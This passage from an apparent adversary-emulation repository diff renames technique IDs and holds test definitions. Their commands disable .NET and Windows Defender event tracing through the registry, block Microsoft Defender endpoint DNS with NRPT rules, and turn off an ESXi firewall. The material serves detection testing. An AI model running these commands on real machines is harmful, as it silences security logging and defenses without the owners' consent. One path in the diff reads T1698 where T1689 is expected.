default: Microsoft-Windows-Powershell
dependency_executor_name: powershell
dependencies:
- description: PSExec must be installed on the machine.
prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
executor:
command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
supported_platforms:
- windows
executor:
command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
name: powershell
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
name: powershell
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
name: powershell
elevation_required: true
- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
supported_platforms:
- windows
executor:
command: |-
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
cleanup_command: |-
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
name: powershell
elevation_required: true
atomics/T1562.004/T1562.004.md → atomics/T1686/T1686.md
+5 -5
View File
@@ -1,4 +1,4 @@
# T1562.004 - Impair Defenses: Disable or Modify System Firewall
# T1686 - Disable or Modify System Firewall
## Description from ATT&CK
@@ -10,7 +10,7 @@
>
> In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)
[Source](https://attack.mitre.org/techniques/T1562/004)
[Source](https://attack.mitre.org/techniques/T1686)
## Atomic Tests
@@ -159,7 +159,7 @@ This test will attempt to allow an executable through the system firewall locate
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1562.004&#92;bin&#92;AtomicTest.exe|
| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1686&#92;bin&#92;AtomicTest.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
@@ -758,13 +758,13 @@ Adversaries may disable the ESXI firewall via ESXCLI
#### Attack Commands: Run with `command_prompt`!
```cmd
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
```
#### Cleanup Commands
```cmd
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
```
#### Dependencies: Run with `powershell`!
atomics/T1562.004/T1562.004.yaml → atomics/T1686/T1686.yaml
+5 -5
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.004
display_name: 'Impair Defenses: Disable or Modify System Firewall'
attack_technique: T1686
display_name: 'Disable or Modify System Firewall'
atomic_tests:
- name: Disable Microsoft Defender Firewall
auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f
@@ -79,7 +79,7 @@ atomic_tests:
exe_file_path:
description: path to exe file
type: path
default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe
default: PathToAtomicsFolder\T1686\bin\AtomicTest.exe
executor:
command: |
Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force
@@ -473,9 +473,9 @@ atomic_tests:
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: |
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
cleanup_command: |
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
name: command_prompt
elevation_required: false
- name: Set a firewall rule using New-NetFirewallRule
atomics/T1562.004/bin/AtomicTest.exe → atomics/T1686/bin/AtomicTest.exe
View File
atomics/T1562.004/src/esxi_disable_firewall.txt → atomics/T1686/src/esxi_disable_firewall.txt
View File
atomics/T1562.004/src/esxi_enable_firewall.txt → atomics/T1686/src/esxi_enable_firewall.txt
View File
atomics/T1562.009/T1562.009.md → atomics/T1688/T1688.md
+2 -2
View File
@@ -1,4 +1,4 @@
# T1562.009 - Impair Defenses: Safe Boot Mode
# T1688 - Safe Mode Boot
## Description from ATT&CK
@@ -8,7 +8,7 @@
>
> Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
[Source](https://attack.mitre.org/techniques/T1562/009)
[Source](https://attack.mitre.org/techniques/T1688)
## Atomic Tests
atomics/T1562.009/T1562.009.yaml → atomics/T1688/T1688.yaml
+2 -2
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.009
display_name: 'Impair Defenses: Safe Boot Mode'
attack_technique: T1688
display_name: 'Safe Mode Boot'
atomic_tests:
- name: Safe Mode Boot
auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85
atomics/T1562.010/T1562.010.md → atomics/T1689/T1689.md
+3 -3
View File
@@ -1,4 +1,4 @@
# T1562.010 - Impair Defenses: Downgrade Attack
# T1689 - Downgrade Attack
## Description from ATT&CK
@@ -8,7 +8,7 @@
>
> Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)
[Source](https://attack.mitre.org/techniques/T1562/010)
[Source](https://attack.mitre.org/techniques/T1689)
## Atomic Tests
@@ -77,7 +77,7 @@ An adversary will change the VIB acceptance level to CommunitySupported to downg
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1562.010&#92;src&#92;esx_community_supported.txt|
| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1689&#92;src&#92;esx_community_supported.txt|
#### Attack Commands: Run with `command_prompt`!
atomics/T1562.010/T1562.010.yaml → atomics/T1689/T1689.yaml
+3 -3
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.010
display_name: 'Impair Defenses: Downgrade Attack'
attack_technique: T1689
display_name: 'Downgrade Attack'
atomic_tests:
- name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
@@ -65,7 +65,7 @@ atomic_tests:
cli_script:
description: Path to script with commands to change acceptance level
type: path
default: PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt
default: PathToAtomicsFolder\T1698\src\esx_community_supported.txt
dependency_executor_name: powershell
dependencies:
- description: |
atomics/T1562.010/src/esx_community_supported.txt → atomics/T1689/src/esx_community_supported.txt
View File
atomics/T1562.003/T1562.003.md → atomics/T1690/T1690.md
+2 -2
View File
@@ -1,4 +1,4 @@
# T1562.003 - Impair Defenses: Impair Command History Logging
# T1690 - Prevent Command History Logging
## Description from ATT&CK
@@ -12,7 +12,7 @@
>
> Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).
[Source](https://attack.mitre.org/techniques/T1562/003)
[Source](https://attack.mitre.org/techniques/T1690)
## Atomic Tests
atomics/T1562.003/T1562.003.yaml → atomics/T1690/T1690.yaml
+2 -2
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.003
display_name: 'Impair Defenses: Impair Command History Logging'
attack_technique: T1690
display_name: 'Prevent Command History Logging'
atomic_tests:
- name: Disable history collection
auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5